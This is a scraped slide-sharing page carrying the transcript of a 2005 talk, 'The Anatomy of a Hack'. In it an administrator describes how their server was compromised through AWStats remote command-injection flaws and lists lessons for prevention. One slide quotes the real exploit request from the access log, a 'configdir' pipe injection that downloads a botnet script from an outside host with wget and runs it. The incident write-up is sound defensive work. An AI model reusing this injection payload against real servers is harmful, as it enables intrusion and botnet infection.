Download
the anatomy of a hack n.
Skip this Video
Loading SlideShow in 5 Seconds..
The Anatomy of a Hack PowerPoint Presentation
Download Presentation
The Anatomy of a Hack

The Anatomy of a Hack

345 Vues Download Presentation
Télécharger la présentation

The Anatomy of a Hack

- - - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript

  1. The Anatomy of a Hack March 2005

  2. The vulnerabilities…. • 2005-02-25:  AWStats Plugin Multiple Remote Command Execution Vulnerabilities   • 2005-02-16:  AWStats Logfile Parameter Remote Command Execution Vulnerability   • 2005-02-16:  AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability   • 2005-02-16:  AWStats Remote Command Execution Vulnerability   • 2005-02-14:  AWStats Debug Remote Information Disclosure Vulnerability   • 2005-01-15:  AWStats Multiple Unspecified Remote Input Validation Vulnerabilities

  3. AWStats Multiple Unspecified Remote Input Validation Vulnerabilities (15 Jan) • Multiple unspecified remote input validation vulnerabilities affect AWStats. These issues are due to a failure of the application to perform proper validation on user-supplied input prior to using it to carry out some critical function. • Although unconfirmed an attacker may leverage these issues to execute commands and disclose sensitive information with the privileges of the underlying Web server.

  4. AWStats Remote Command Execution Vulnerability (16 Feb) • AWStats is reported prone to a remote arbitrary command execution vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data. • An attacker can prefix arbitrary commands with the '|' character and have them executed in the context of the server through a URI parameter.

  5. The First Probe… [05/Mar/2005:01:29:55 -0600] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

  6. The Exploit… [13/Mar/2005:19:17:12 -0600] "POST /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;killall%20%20perl;cd%20/tmp;wget%20ssh.a.la/botnet;perl%20botnet;rm%20botnet;echo%20;echo| HTTP/1.0" 200 414 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

  7. Results of Exploits • Left lots of litter in /tmp • Opened up multiple listeners (est. 6) • Most were botnet daemons or backdoors • Clean up has been fun and educational • No damage to the system just had my ego dinged up a little • Valuable reminder – Don’t get complacent

  8. How I could have prevented it • Stay on top of vulnerabilities • They are always shortly followed by exploits • Patch/Upgrade as soon as possible • Review logs and check your file systems • I.e. /tmp would have been and easy tip-off • Know what listeners are running and check them regularly